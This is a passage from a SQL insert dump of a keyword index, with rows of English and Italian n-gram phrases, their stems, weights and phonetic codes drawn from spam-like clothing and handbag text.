but','trivial but',0,1,1.3667,'T61413',1,'en'),(35054,'trivial but immensely','trivial but immensely',0,1,1.7,'T61413524',1,'en'),(35055,'trivial however','trivial however',0,1,1.5,'T61416',1,'en'),(35056,'trivial however the','trivial however the',0,1,1.6333,'T614163',1,'en'),(35057,'types of','type of',0,1,1.2667,'T121',1,'en'),(35058,'types of agencies','type of agencies',0,1,1.5667,'T121252',1,'en'),(35059,'typically','typic',0,0,0.6,'T124',1,'en'),(35060,'typically charge','typic charge',0,1,1.5333,'T124262',1,'en'),(35061,'typically charge cheap','typic charge cheap',0,1,1.7333,'T1242621',1,'en'),(35062,'under this','under this',0,1,1.3333,'U53632',1,'en'),(35063,'under this theme','under this theme',0,1,1.5333,'U5363235',1,'en'),(35064,'until','until',1,0,0.0417,'U534',4,'en'),(35065,'until it','until it',0,1,1.2667,'U5343',1,'en'),(35066,'until it perfectly','until it perfectly',0,1,1.6,'U5343161234',1,'en'),(35067,'up the urine','up the urine',0,1,1.4,'U1365',1,'en'),(35068,'urine','urin',0,0,0.3333,'U650',1,'en'),(35069,'urine polo','urin polo',0,1,1.3333,'U6514',1,'en'),(35070,'urine polo ralph','urin polo ralph',0,1,1.5333,'U6514641',1,'en'),(35071,'us look','us look',0,1,1.2333,'U242',1,'en'),(35072,'us look at','us look at',0,1,1.3333,'U2423',1,'en'),(35073,'use as','us as',0,1,1.2,'U200',1,'en'),(35074,'use as ralph','us as ralph',0,1,1.4,'U2641',1,'en'),(35075,'use of soap','us of soap',0,1,1.3667,'U2121',1,'en'),(35076,'used on','us on',0,1,1.2333,'U235',1,'en'),(35077,'used on smaller','us on smaller',0,1,1.5,'U2352546',1,'en'),(35078,'usual','usual',0,0,0.3333,'U240',1,'en'),(35079,'usual ralph','usual ralph',0,1,1.3667,'U24641',1,'en'),(35080,'usual ralph lauren','usual ralph lauren',0,1,1.6,'U24641465',1,'en'),(35081,'usually to','usual to',0,1,1.3333,'U243',1,'en'),(35082,'usually to be','usual to be',0,1,1.4333,'U2431',1,'en'),(35083,'variety','varieti',0,0,0.4667,'V630',1,'en'),(35084,'variety of','varieti of',0,1,1.3333,'V631',1,'en'),(35085,'variety of business','varieti of business',0,1,1.6333,'V631252',1,'en'),(35086,'various commercial','variou commercial',0,1,1.6,'V625624',1,'en'),(35087,'various commercial cheap','variou commercial cheap',0,1,1.8,'V62562421',1,'en'),(35088,'various periodicities','variou periodicities',0,1,1.7,'V62163232',1,'en'),(35089,'various periodicities then','variou periodicities then',0,1,1.8667,'V6216323235',1,'en'),(35090,'very mens','veri mens',0,1,1.3,'V652',1,'en'),(35091,'very mens ralph','veri mens ralph',0,1,1.5,'V652641',1,'en'),(35092,'very polo','veri polo',0,1,1.3,'V614',1,'en'),(35093,'very polo ralph','veri polo ralph',0,1,1.5,'V614641',1,'en'),(35094,'vinegar','vinegar',0,0,0.4667,'V526',1,'en'),(35095,'vinegar some','vinegar some',0,1,1.4,'V52625',1,'en'),(35096,'vinegar some sort','vinegar some sort',0,1,1.5667,'V52625263',1,'en'),(35097,'water','water',0,0,0.3333,'W360',1,'en'),(35098,'water cleansers','water cleansers',0,1,1.5,'W36245262',1,'en'),(35099,'water cleansers to','water cleansers to',0,1,1.6,'W362452623',1,'en'),(35100,'water in','water in',0,1,1.2667,'W365',1,'en'),(35101,'water in the','water in the',0,1,1.4,'W3653',1,'en'),(35102,'water that','water that',0,1,1.3333,'W363',1,'en'),(35103,'water that is','water that is',0,1,1.4333,'W3632',1,'en'),(35104,'water the','water the',0,1,1.3,'W363',1,'en'),(35105,'water the use','water the use',0,1,1.4333,'W3632',1,'en'),(35106,'we are ralph','we are ralph',0,1,1.4,'W641',1,'en'),(35107,'we evaluate','we evaluate',0,1,1.3667,'W143',1,'en'),(35108,'we evaluate the','we evaluate the',0,1,1.5,'W143',1,'en'),(35109,'weight into','weight into',0,1,1.3667,'W2353',1,'en'),(35110,'weight into it','weight into it',0,1,1.4667,'W2353',1,'en'),(35111,'well masters','well masters',0,1,1.4,'W452362',1,'en'),(35112,'well masters ralph','well masters ralph',0,1,1.6,'W452362641',1,'en'),(35113,'whether you clean','whether you clean',0,1,1.5667,'W36245',1,'en'),(35114,'which polo','which polo',0,1,1.3333,'W214',1,'en'),(35115,'which polo ralph','which polo ralph',0,1,1.5333,'W214641',1,'en'),(35116,'wholesale','wholesal',0,0,0.6,'W424',2,'en'),(35117,'wholesale polo','wholesal polo',0,1,1.4667,'W42414',2,'en'),(35118,'wholesale polo ralph','wholesal polo ralph',0,1,1.6667,'W42414641',2,'en'),(35119,'wholesale ralph','wholesal ralph',0,1,1.5,'W424641',2,'en'),(35120,'wholesale ralph lauren','wholesal ralph lauren',0,1,1.7333,'W424641465',2,'en'),(35121,'wholesale your','wholesal your',0,1,1.4667,'W4246',1,'en'),(35122,'wholesale your polo','wholesal your polo',0,1,1.6333,'W424614',1,'en'),(35123,'will be delivered','will be delivered',0,1,1.5667,'W4134163',1,'en'),(35124,'will come','will come',0,1,1.3,'W425',1,'en'),(35125,'will come in','will come in',0,1,1.4,'W425',1,'en'),(35126,'will comprehensive','will comprehensive',0,1,1.6,'W42516521',1,'en'),(35127,'will comprehensive ralph','will comprehensive ralph',0,1,1.8,'W42516521641',1,'en'),(35128,'windows they','window they',0,1,1.4,'W5323',1,'en'),(35129,'windows they connect','window they connect',0,1,1.6667,'W53232523',1,'en'),(35130,'windows which','window which',0,1,1.4333,'W532',1,'en'),(35131,'windows which polo','window which polo',0,1,1.6,'W53214',1,'en'),(35132,'windows yourself','window yourself',0,1,1.5333,'W5326241',1,'en'),(35133,'windows yourself or','window yourself or',0,1,1.6333,'W53262416',1,'en'),(35134,'with a different','with a different',0,1,1.5333,'W31653',1,'en'),(35135,'with optimal','with optimal',0,1,1.4,'W31354',1,'en'),(35136,'with optimal solutions','with optimal solutions',0,1,1.7333,'W3135424352',1,'en'),(35137,'with substances','with substances',0,1,1.5,'W3212352',1,'en'),(35138,'with substances cleaning','with substances cleaning',0,1,1.8,'W3212352452',1,'en'),(35139,'with the main','with the main',0,1,1.4333,'W350',1,'en'),(35140,'with the services','with the services',0,1,1.5667,'W32612',1,'en'),(35141,'with various','with various',0,1,1.4,'W3162',1,'en'),(35142,'with various periodicities','with various periodicities',0,1,1.8667,'W3162163232',1,'en'),(35143,'women definitely','women definitely',0,1,1.5333,'W531534',1,'en'),(35144,'women definitely require','women definitely require',0,1,1.8,'W531534626',1,'en'),(35145,'women dresses','women dresses',0,1,1.4333,'W5362',2,'en'),(35146,'women dresses take','women dresses take',0,1,1.6,'W536232',1,'en'),(35147,'women him','women him',0,1,1.3,'W500',1,'en'),(35148,'women him and','women him and',0,1,1.4333,'W530',1,'en'),(35149,'women positive','women positive',0,1,1.4667,'W51231',1,'en'),(35150,'women positive basic','women positive basic',0,1,1.6667,'W512312',1,'en'),(35151,'women ralph','women ralph',0,1,1.3667,'W5641',2,'en'),(35152,'women ralph lauren','women ralph lauren',0,1,1.6,'W5641465',2,'en'),(35153,'women s','women s',0,1,1.2333,'W520',2,'en'),(35154,'women s dresses','women s dresses',0,1,1.5,'W52362',1,'en'),(35155,'women s sandals','women s sandals',0,1,1.5,'W525342',2,'en'),(35156,'women s sport','women s sport',0,1,1.4333,'W52163',2,'en'),(35157,'women serve','women serve',0,1,1.3667,'W5261',1,'en'),(35158,'women serve your','women serve your',0,1,1.5333,'W52616',1,'en'),(35159,'women that','women that',0,1,1.3333,'W530',1,'en'),(35160,'women that trivial','women that trivial',0,1,1.6,'W53614',1,'en'),(35161,'women that wholesale','women that wholesale',0,1,1.6667,'W53424',1,'en'),(35162,'women with','women with',0,1,1.3333,'W530',1,'en'),(35163,'women with optimal','women with optimal',0,1,1.6,'W531354',1,'en'),(35164,'womens','women',0,0,0.4,'W520',2,'en'),(35165,'womens chore','women chore',0,1,1.4,'W526',1,'en'),(35166,'womens chore one','women chore one',0,1,1.5333,'W5265',1,'en'),(35167,'womens hoodies','women hoodies',0,1,1.4667,'W5232',2,'en'),(35168,'womens hoodies online','women hoodies online',0,1,1.7,'W5232545',1,'en'),(35169,'womens polo','women polo',0,1,1.3667,'W5214',1,'en'),(35170,'womens polo ralph','women polo ralph',0,1,1.5667,'W5214641',1,'en'),(35171,'womens ralph','women ralph',0,1,1.4,'W52641',2,'en'),(35172,'womens ralph lauren','women ralph lauren',0,1,1.6333,'W52641465',2,'en'),(35173,'womens sandals','women sandals',0,1,1.4667,'W525342',1,'en'),(35174,'womens sandals online','women sandals online',0,1,1.7,'W525342545',1,'en'),(35175,'womens sport','women sport',0,1,1.4,'W52163',1,'en'),(35176,'womens sport shirt','women sport shirt',0,1,1.6,'W52163263',1,'en'),(35177,'womens sweaters','women sweaters',0,1,1.5,'W52362',2,'en'),(35178,'womens sweaters sort','women sweaters sort',0,1,1.6667,'W5236263',1,'en'),(35179,'wooden','wooden',0,0,0.4,'W350',1,'en'),(35180,'wooden boards','wooden boards',0,1,1.4333,'W351632',1,'en'),(35181,'wooden boards work','wooden boards work',0,1,1.6,'W35163262',1,'en'),(35182,'work okay','work okay',0,1,1.3,'W620',1,'en'),(35183,'work okay fold','work okay fold',0,1,1.4667,'W62143',1,'en'),(35184,'work polo','work polo',0,1,1.3,'W6214',1,'en'),(35185,'work polo ralph','work polo ralph',0,1,1.5,'W6214641',1,'en'),(35186,'work ralph','work ralph',0,1,1.3333,'W62641',1,'en'),(35187,'work ralph lauren','work ralph lauren',0,1,1.5667,'W62641465',1,'en'),(35188,'work with','work with',0,1,1.3,'W623',1,'en'),(35189,'work with a','work with a',0,1,1.3667,'W623',1,'en'),(35190,'would assist','would assist',0,1,1.4,'W4323',1,'en'),(35191,'would assist the','would assist the',0,1,1.5333,'W4323',1,'en'),(35192,'would ralph','would ralph',0,1,1.3667,'W43641',1,'en'),(35193,'would ralph lauren','would ralph lauren',0,1,1.6,'W43641465',1,'en'),(35194,'would typically','would typically',0,1,1.5,'W43124',1,'en'),(35195,'would typically charge','would typically charge',0,1,1.7333,'W43124262',1,'en'),(35196,'would womens','would womens',0,1,1.4,'W4352',1,'en'),(35197,'would womens polo','would womens polo',0,1,1.5667,'W435214',1,'en'),(35198,'you can employ','you can employ',0,1,1.4667,'Y2514',1,'en'),(35199,'you clean','you clean',0,1,1.3,'Y245',1,'en'),(35200,'you clean women','you clean women',0,1,1.5,'Y245',1,'en'),(35201,'you get practical','you get practical',0,1,1.5667,'Y23162324',1,'en'),(35202,'you may use','you may use',0,1,1.3667,'Y520',1,'en'),(35203,'you need not','you need not',0,1,1.4,'Y5353',1,'en'),(35204,'your household','your household',0,1,1.4667,'Y6243',1,'en'),(35205,'your household ralph','your household ralph',0,1,1.6667,'Y6243641',1,'en'),(35206,'your household they','your household they',0,1,1.6333,'Y6243',1,'en'),(35207,'your polo','your polo',0,1,1.3,'Y614',1,'en'),(35208,'your polo ralph','your polo ralph',0,1,1.5,'Y614641',1,'en'),(35209,'your regular','your regular',0,1,1.4,'Y6246',1,'en'),(35210,'your regular cleaning','your regular cleaning',0,1,1.7,'Y62462452',1,'en'),(35211,'yourself or get','yourself or get',0,1,1.5,'Y6241623',1,'en'),(35212,'zero','zero',0,0,0.2667,'Z600',1,'en'),(35213,'zero mens','zero mens',0,1,1.3,'Z652',1,'en'),(35214,'zero mens ralph','zero mens ralph',0,1,1.5,'Z652641',1,'en'),(35215,'129','129',0,0,0.3,'',1,'en'),(35216,'a put','a put',0,1,1.1667,'A130',1,'en'),(35217,'a put proposta','a put proposta',0,1,1.4667,'A1316123',1,'en'),(35218,'a righe','a righe',0,1,1.2333,'A620',1,'en'),(35219,'a righe ralph','a righe ralph',0,1,1.4333,'A62641',1,'en'),(35220,'a sacca','a sacca',0,1,1.2333,'A200',1,'en'),(35221,'a sacca e','a sacca e',0,1,1.3,'A200',1,'en'),(35222,'a.scelta','a.scelta',0,0,0.5333,'A243',1,'en'),(35223,'a.scelta è','a.scelta è',0,1,1.3333,'A243',1,'en'),(35224,'a.scelta è vastissima','a.scelta è vastissima',0,1,1.7,'A24312325',1,'en'),(35225,'accentati','accentati',0,0,0.6,'A253',1,'en'),(35226,'accentati minus','accentati minus',0,1,1.5,'A25352',1,'en'),(35227,'accentati minus morbida','accentati minus morbida',0,1,1.7667,'A253525613',1,'en'),(35228,'accenti','accenti',0,0,0.4667,'A253',1,'en'),(35229,'accenti big','accenti big',0,1,1.3667,'A25312',1,'en'),(35230,'accenti big horse','accenti big horse',0,1,1.5667,'A2531262',1,'en'),(35231,'accentuato','accentuato',0,0,0.6667,'A253',1,'en'),(35232,'accentuato da','accentuato da',0,1,1.4333,'A253',1,'en'),(35233,'accentuato da cuciture','accentuato da cuciture',0,1,1.7333,'A253236',1,'en'),(35234,'alla ricerca','alla ricerca',0,1,1.4,'A46262',1,'en'),(35235,'alla ricerca di','alla ricerca di',0,1,1.5,'A462623',1,'en'),(35236,'alleata','alleata',0,0,0.4667,'A430',1,'en'),(35237,'alleata ma','alleata ma',0,1,1.3333,'A435',1,'en'),(35238,'alleata ma quella','alleata ma quella',0,1,1.5667,'A43524',1,'en'),(35239,'anche la','anch la',0,1,1.2667,'A524',1,'en'),(35240,'anche la stuoia','anch la stuoia',0,1,1.5,'A52423',1,'en'),(35241,'anteriore','anterior',0,0,0.6,'A536',1,'en'),(35242,'anteriore interni','anterior interni',0,1,1.5667,'A5365365',1,'en'),(35243,'anteriore interni tasca','anterior interni tasca',0,1,1.7667,'A536536532',1,'en'),(35244,'applicata','applicata',0,0,0.6,'A1423',1,'en'),(35245,'applicata scomparto','applicata scomparto',0,1,1.6333,'A142325163',1,'en'),(35246,'applicata scomparto interno','applicata scomparto interno',0,1,1.9,'A1423251635365',1,'en'),(35247,'are generally parte','ar generally parte',0,1,1.6333,'A62564163',1,'en'),(35248,'area logo','area logo',0,1,1.3,'A642',1,'en'),(35249,'area logo in','area logo in',0,1,1.4,'A6425',1,'en'),(35250,'attraversa','attraversa',0,0,0.6667,'A36162',1,'en'),(35251,'attraversa are','attraversa are',0,1,1.4667,'A361626',1,'en'),(35252,'attraversa are generally','attraversa are generally',0,1,1.8,'A3616262564',1,'en'),(35253,'bag','bag',0,0,0.2,'B200',3,'en'),(35254,'bag è','bag è',0,1,1.1667,'B200',1,'en'),(35255,'bag è una','bag è una',0,1,1.3,'B250',1,'en'),(35256,'bandiera','bandiera',0,0,0.5333,'B536',1,'en'),(35257,'bandiera pieced','bandiera pieced',0,1,1.5,'B536123',1,'en'),(35258,'bandiera pieced in','bandiera pieced in',0,1,1.6,'B5361235',1,'en'),(35259,'beachfront','beachfront',0,0,0.6667,'B21653',1,'en'),(35260,'beachfront bag','beachfront bag',0,1,1.4667,'B2165312',1,'en'),(35261,'beachfront bag è','beachfront bag è',0,1,1.5333,'B2165312',1,'en'),(35262,'bellissimo','bellissimo',0,0,0.6667,'B425',1,'en'),(35263,'bellissimo colore','bellissimo colore',0,1,1.5667,'B425246',1,'en'),(35264,'bellissimo colore moda','bellissimo colore moda',0,1,1.7333,'B42524653',1,'en'),(35265,'big horse','big horse',0,1,1.3,'B262',1,'en'),(35266,'big horse ricamato','big horse ricamato',0,1,1.6,'B2626253',1,'en'),(35267,'bisogno','bisogno',0,0,0.4667,'B250',1,'en'),(35268,'bisogno elow','bisogno elow',0,1,1.4,'B254',1,'en'),(35269,'bisogno elow sia','bisogno elow sia',0,1,1.5333,'B2542',1,'en'),(35270,'borsa','borsa',0,0,0.3333,'B620',1,'en'),(35271,'borsa è','borsa è',0,1,1.2333,'B620',1,'en'),(35272,'borsa è not','borsa è not',0,1,1.3667,'B6253',1,'en'),(35273,'borsa polo','borsa polo',0,1,1.3333,'B6214',1,'en'),(35274,'borsa polo ralph','borsa polo ralph',0,1,1.5333,'B6214641',1,'en'),(35275,'borsa pratica','borsa pratica',0,1,1.4333,'B621632',1,'en'),(35276,'borsa pratica e','borsa pratica e',0,1,1.5,'B621632',1,'en'),(35277,'borse','bors',0,0,0.3333,'B620',1,'en'),(35278,'borse material','bors material',0,1,1.4667,'B625364',1,'en'),(35279,'borse material includono','bors material includono',0,1,1.8,'B62536452435',1,'en'),(35280,'borse oversize','bors oversize',0,1,1.4667,'B62162',1,'en'),(35281,'borse oversize trovo','bors oversize trovo',0,1,1.6667,'B62162361',1,'en'),(35282,'borse per','bors per',0,1,1.3,'B6216',1,'en'),(35283,'borse per tutti','bors per tutti',0,1,1.5,'B62163',1,'en'),(35284,'business pages 3','busi pages 3',0,1,1.5333,'B25212',1,'en'),(35285,'by yourself il','by yourself il',0,1,1.4667,'B62414',1,'en'),(35286,'canvas','canva',0,0,0.4,'C512',1,'en'),(35287,'canvas designer','canva designer',0,1,1.5,'C5123256',1,'en'),(35288,'canvas designer handbag','canva designer handbag',0,1,1.7667,'C51232565312',1,'en'),(35289,'capiente','capient',0,0,0.5333,'C153',1,'en'),(35290,'capiente il','capient il',0,1,1.3667,'C1534',1,'en'),(35291,'capiente il sogno','capient il sogno',0,1,1.5667,'C153425',1,'en'),(35292,'cassetto','cassetto',0,0,0.5333,'C300',1,'en'),(35293,'cassetto personale','cassetto personale',0,1,1.6,'C316254',1,'en'),(35294,'cassetto personale dove','cassetto personale dove',0,1,1.7667,'C31625431',1,'en'),(35295,'cellulare','cellular',0,0,0.6,'C460',1,'en'),(35296,'cellulare e','cellular e',0,1,1.3667,'C460',1,'en'),(35297,'cellulare e tasca','cellular e tasca',0,1,1.5667,'C4632',1,'en'),(35298,'cercando','cercando',0,0,0.5333,'C6253',1,'en'),(35299,'cercando ralphlauren','cercando ralphlauren',0,1,1.6667,'C6253641465',1,'en'),(35300,'cercando ralphlauren italia','cercando ralphlauren italia',0,1,1.9,'C625364146534',1,'en'),(35301,'che fa per','che fa per',0,1,1.3333,'C160',1,'en'),(35302,'chiusura','chiusura',0,0,0.5333,'C600',1,'en'),(35303,'chiusura a','chiusura a',0,1,1.3333,'C600',1,'en'),(35304,'chiusura a put','chiusura a put',0,1,1.4667,'C613',1,'en'),(35305,'ciò','ciò',0,0,0.2,'C000',1,'en'),(35306,'ciò di','ciò di',0,1,1.2,'C300',1,'en'),(35307,'ciò di cui','ciò di cui',0,1,1.3333,'C320',1,'en'),(35308,'colore','color',0,0,0.4,'C460',1,'en'),(35309,'colore contrastante','color contrastante',0,1,1.6333,'C4625362353',1,'en'),(35310,'colore contrastante originali','color contrastante originali',0,1,1.9667,'C46253623536254',1,'en'),(35311,'colore moda','color moda',0,1,1.3667,'C4653',1,'en'),(35312,'colore moda l\'interno','color moda l',0,1,1.7,'C465345365',1,'en'),(35313,'comodi','comodi',0,0,0.4,'C530',2,'en'),(35314,'comodi maancheallure','comodi maancheallure',0,1,1.6667,'C535246',1,'en'),(35315,'comodi maancheallure negli','comodi maancheallure negli',0,1,1.8667,'C535246524',1,'en'),(35316,'con nothing','con nothing',0,1,1.3667,'C5352',1,'en'),(35317,'con nothing finiture','con nothing finiture',0,1,1.6667,'C53521536',1,'en'),(35318,'con una fodera','con una fodera',0,1,1.4667,'C5136',1,'en'),(35319,'concerning cellulare','concern cellulare',0,1,1.6667,'C5265246',1,'en'),(35320,'concerning cellulare e','concern cellulare e',0,1,1.7333,'C5265246',1,'en'),(35321,'contenere','contener',0,0,0.6,'C5356',1,'en'),(35322,'contenere non','contener non',0,1,1.4333,'C53565',1,'en'),(35323,'contenere non by','contener non by',0,1,1.5333,'C535651',1,'en'),(35324,'contenere tutto','contener tutto',0,1,1.5,'C53563',1,'en'),(35325,'contenere tutto ciò','contener tutto ciò',0,1,1.6333,'C535632',1,'en'),(35326,'contrastante','contrastant',0,0,0.8,'C5362353',1,'en'),(35327,'contrastante originali','contrastant originali',0,1,1.7333,'C53623536254',1,'en'),(35328,'contrastante originali ralph','contrastant originali ralph',0,1,1.9333,'C53623536254641',1,'en'),(35329,'contrasto','contrasto',0,0,0.6,'C53623',1,'en'),(35330,'contrasto firma','contrasto firma',0,1,1.5,'C53623165',1,'en'),(35331,'contrasto firma lauren','contrasto firma lauren',0,1,1.7333,'C53623165465',1,'en'),(35332,'cose','cose',0,0,0.2667,'C000',1,'en'),(35333,'cose gna','cose gna',0,1,1.2667,'C500',1,'en'),(35334,'cose gna siano','cose gna siano',0,1,1.4667,'C525',1,'en'),(35335,'costruzione','costruzion',0,0,0.7333,'C3625',1,'en'),(35336,'costruzione in','costruzion in',0,1,1.4667,'C3625',1,'en'),(35337,'costruzione in un','costruzion in un',0,1,1.5667,'C3625',1,'en'),(35338,'cotone','coton',0,0,0.4,'C350',1,'en'),(35339,'cotone accentati','coton accentati',0,1,1.5333,'C35253',1,'en'),(35340,'cotone accentati minus','coton accentati minus',0,1,1.7333,'C3525352',1,'en'),(35341,'cotone di','coton di',0,1,1.3,'C353',1,'en'),(35342,'cotone di pelle','coton di pelle',0,1,1.5,'C35314',1,'en'),(35343,'creme','creme',0,0,0.3333,'C650',1,'en'),(35344,'creme solari','creme solari',0,1,1.4,'C65246',1,'en'),(35345,'creme solari il','creme solari il',0,1,1.5,'C652464',1,'en'),(35346,'croquet','croquet',0,0,0.4667,'C623',1,'en'),(35347,'croquet semplice','croquet semplice',0,1,1.5333,'C62325142',1,'en'),(35348,'croquet semplice e','croquet semplice e',0,1,1.6,'C62325142',1,'en'),(35349,'cuciture','cucitur',0,0,0.5333,'C360',1,'en'),(35350,'cuciture di','cucitur di',0,1,1.3667,'C363',1,'en'),(35351,'cuciture di contrasto','cucitur di contrasto',0,1,1.7,'C363253623',1,'en'),(35352,'cui ho','cui ho',0,1,1.2,'C000',1,'en'),(35353,'cui ho bisogno','cui ho bisogno',0,1,1.4667,'C125',1,'en'),(35354,'da cuciture','da cuciture',0,1,1.3667,'D236',1,'en'),(35355,'da cuciture di','da cuciture di',0,1,1.4667,'D2363',1,'en'),(35356,'da on','da on',0,1,1.1667,'D500',1,'en'),(35357,'da on ma','da on ma',0,1,1.2667,'D500',1,'en'),(35358,'da tela','da tela',0,1,1.2333,'D400',1,'en'),(35359,'da tela di','da tela di',0,1,1.3333,'D430',1,'en'),(35360,'davanti','davanti',0,0,0.4667,'D153',1,'en'),(35361,'davanti striscia','davanti striscia',0,1,1.5333,'D1532362',1,'en'),(35362,'davanti striscia bandiera','davanti striscia bandiera',0,1,1.8333,'D15323621536',1,'en'),(35363,'davvero','davvero',0,0,0.4667,'D160',1,'en'),(35364,'davvero di','davvero di',0,1,1.3333,'D163',1,'en'),(35365,'davvero di tutto','davvero di tutto',0,1,1.5333,'D163',1,'en'),(35366,'delle varie','dell varie',0,1,1.3667,'D416',1,'en'),(35367,'delle varie specialist','dell varie specialist',0,1,1.7333,'D416212423',1,'en'),(35368,'designer handbag','design handbag',0,1,1.5333,'D2565312',1,'en'),(35369,'designer handbag è','design handbag è',0,1,1.6,'D2565312',1,'en'),(35370,'dettagli','dettagli',0,0,0.5333,'D240',1,'en'),(35371,'dettagli i','dettagli i',0,1,1.3333,'D240',1,'en'),(35372,'dettagli i nostri','dettagli i nostri',0,1,1.5667,'D245236',1,'en'),(35373,'deve poter','deve poter',0,1,1.3333,'D136',1,'en'),(35374,'deve poter contenere','deve poter contenere',0,1,1.6667,'D13625356',1,'en'),(35375,'di contrasto','di contrasto',0,1,1.4,'D253623',1,'en'),(35376,'di contrasto firma','di contrasto firma',0,1,1.6,'D253623165',1,'en'),(35377,'di cotone','di cotone',0,1,1.3,'D235',1,'en'),(35378,'di cotone accentati','di cotone accentati',0,1,1.6333,'D235253',1,'en'),(35379,'di cotone di','di cotone di',0,1,1.4,'D2353',1,'en'),(35380,'di cui','di cui',0,1,1.2,'D200',1,'en'),(35381,'di cui ho','di cui ho',0,1,1.3,'D200',1,'en'),(35382,'di pelle','di pelle',0,1,1.2667,'D140',1,'en'),(35383,'di pelle intricacciatica','di pelle intricacciatica',0,1,1.8,'D14536232',1,'en'),(35384,'di realizzareaccessori','di realizzareaccessori',0,1,1.7333,'D642626',1,'en'),(35385,'di realizzareaccessori non','di realizzareaccessori non',0,1,1.8667,'D6426265',1,'en'),(35386,'di tela','di tela',0,1,1.2333,'D400',1,'en'),(35387,'di tela plissettate','di tela plissettate',0,1,1.6333,'D41423',1,'en'),(35388,'di tutte','di tutte',0,1,1.2667,'D000',1,'en'),(35389,'di tutte the','di tutte the',0,1,1.4,'D000',1,'en'),(35390,'di tutto','di tutto',0,1,1.2667,'D000',1,'en'),(35391,'di tutto in','di tutto in',0,1,1.3667,'D500',1,'en'),(35392,'di una','di una',0,1,1.2,'D500',1,'en'),(35393,'di una borsa','di una borsa',0,1,1.4,'D5162',1,'en'),(35394,'disadvantage doppio','disadvantag doppio',0,1,1.6333,'D23153231',1,'en'),(35395,'disadvantage i nostri','disadvantag i nostri',0,1,1.7,'D2315325236',1,'en'),(35396,'donne','donn',0,0,0.3333,'D500',1,'en'),(35397,'donne ioamo','donn ioamo',0,1,1.3667,'D500',1,'en'),(35398,'donne ioamo tantissimo','donn ioamo tantissimo',0,1,1.7333,'D535325',1,'en'),(35399,'doppio','doppio',0,0,0.4,'D100',1,'en'),(35400,'dove','dove',0,0,0.2667,'D100',1,'en'),(35401,'dove possiamo','dove possiamo',0,1,1.4333,'D125',1,'en'),(35402,'dove possiamo sistemare','dove possiamo sistemare',0,1,1.7667,'D1252356',1,'en'),(35403,'e capiente','e capiente',0,1,1.3333,'E2153',1,'en'),(35404,'e capiente il','e capiente il',0,1,1.4333,'E21534',1,'en'),(35405,'e gli','e gli',0,1,1.1667,'E240',1,'en'),(35406,'e gli occhiali','e gli occhiali',0,1,1.4667,'E2424',1,'en'),(35407,'è not cassetto','è not cassetto',0,1,1.4667,'è5323',1,'en'),(35408,'e ormai','e ormai',0,1,1.2333,'E650',1,'en'),(35409,'e ormai tutti','e ormai tutti',0,1,1.4333,'E653',1,'en'),(35410,'e raffinata','e raffinata',0,1,1.3667,'E6153',1,'en'),(35411,'e raffinata disadvantage','e raffinata disadvantage',0,1,1.8,'E6153231532',1,'en'),(35412,'è realizzato','è realizzato',0,1,1.4,'è6423',1,'en'),(35413,'è realizzato polo','è realizzato polo',0,1,1.5667,'è642314',1,'en'),(35414,'e rifiniti','e rifiniti',0,1,1.3333,'E6153',1,'en'),(35415,'e rifiniti disadvantage','e rifiniti disadvantage',0,1,1.7667,'E6153231532',1,'en'),(35416,'è rivestito','è rivestito',0,1,1.3667,'è6123',1,'en'),(35417,'è rivestito con','è rivestito con',0,1,1.5,'è612325',1,'en'),(35418,'e stilosa','e stilosa',0,1,1.3,'E2342',1,'en'),(35419,'e stilosa ron','e stilosa ron',0,1,1.4333,'E234265',1,'en'),(35420,'e tasca','e tasca',0,1,1.2333,'E320',1,'en'),(35421,'e tasca applicata','e tasca applicata',0,1,1.5667,'E321423',1,'en'),(35422,'e tasche','e tasche',0,1,1.2667,'E320',1,'en'),(35423,'e tasche interne','e tasche interne',0,1,1.5333,'E325365',1,'en'),(35424,'è una borsa','è una borsa',0,1,1.3667,'è5162',1,'en'),(35425,'è una perfetta','è una perfetta',0,1,1.4667,'è51613',1,'en'),(35426,'è vastissima','è vastissima',0,1,1.4,'è12325',1,'en'),(35427,'è vastissima la','è vastissima la',0,1,1.5,'è123254',1,'en'),(35428,'electronic stampatvitamin','electron stampatvitamin',0,1,1.8333,'E4236523513135',1,'en'),(35429,'electronic stampatvitamin y','electron stampatvitamin y',0,1,1.9,'E4236523513135',1,'en'),(35430,'elow','elow',0,0,0.2667,'E400',1,'en'),(35431,'elow sia','elow sia',0,1,1.2667,'E420',1,'en'),(35432,'elow sia rassicurante','elow sia rassicurante',0,1,1.7,'E4262653',1,'en'),(35433,'ericsson','ericsson',0,0,0.5333,'E625',1,'en'),(35434,'ericsson siete','ericsson siete',0,1,1.4667,'E62523',1,'en'),(35435,'ericsson siete alla','ericsson siete alla',0,1,1.6333,'E625234',1,'en'),(35436,'est una','est una',0,1,1.2333,'E235',1,'en'),(35437,'est una borsa','est una borsa',0,1,1.4333,'E235162',1,'en'),(35438,'every riporvi','everi riporvi',0,1,1.4333,'E16161',1,'en'),(35439,'every riporvi davvero','everi riporvi davvero',0,1,1.7,'E16161316',1,'en'),(35440,'fa per','fa per',0,1,1.2,'F600',1,'en'),(35441,'fa per voi','fa per voi',0,1,1.3333,'F610',1,'en'),(35442,'fatto gna','fatto gna',0,1,1.3,'F325',1,'en'),(35443,'fatto gna possano','fatto gna possano',0,1,1.5667,'F325125',1,'en'),(35444,'filo','filo',0,0,0.2667,'F400',2,'en'),(35445,'filo multicolore','filo multicolore',0,1,1.5333,'F4543246',1,'en'),(35446,'filo multicolore robusto','filo multicolore robusto',0,1,1.8,'F4543246123',1,'en'),(35447,'finiture','finitur',0,0,0.5333,'F536',1,'en'),(35448,'finiture in','finitur in',0,1,1.3667,'F5365',1,'en'),(35449,'finiture in pelle','finitur in pelle',0,1,1.5667,'F536514',1,'en'),(35450,'firma','firma',0,0,0.3333,'F650',1,'en'),(35451,'firma lauren','firma lauren',0,1,1.4,'F65465',1,'en'),(35452,'firma lauren in','firma lauren in',0,1,1.5,'F65465',1,'en'),(35453,'fodera','fodera',0,0,0.4,'F360',1,'en'),(35454,'fodera a','fodera a',0,1,1.2667,'F360',1,'en'),(35455,'fodera a sacca','fodera a sacca',0,1,1.4667,'F362',1,'en'),(35456,'for every riporvi','for every riporvi',0,1,1.5667,'F616161',1,'en'),(35457,'generally parte','gener parte',0,1,1.5,'G564163',1,'en'),(35458,'generally parte anteriore','gener parte anteriore',0,1,1.8333,'G564163536',1,'en'),(35459,'giocatori','giocatori',0,0,0.6,'G360',1,'en'),(35460,'giocatori sovradimensionato','giocatori sovradimensionato',0,1,1.9,'G3621635253',1,'en'),(35461,'giocatori sovradimensionato polo','giocatori sovradimensionato polo',0,1,2,'G362163525314',1,'en'),(35462,'gli 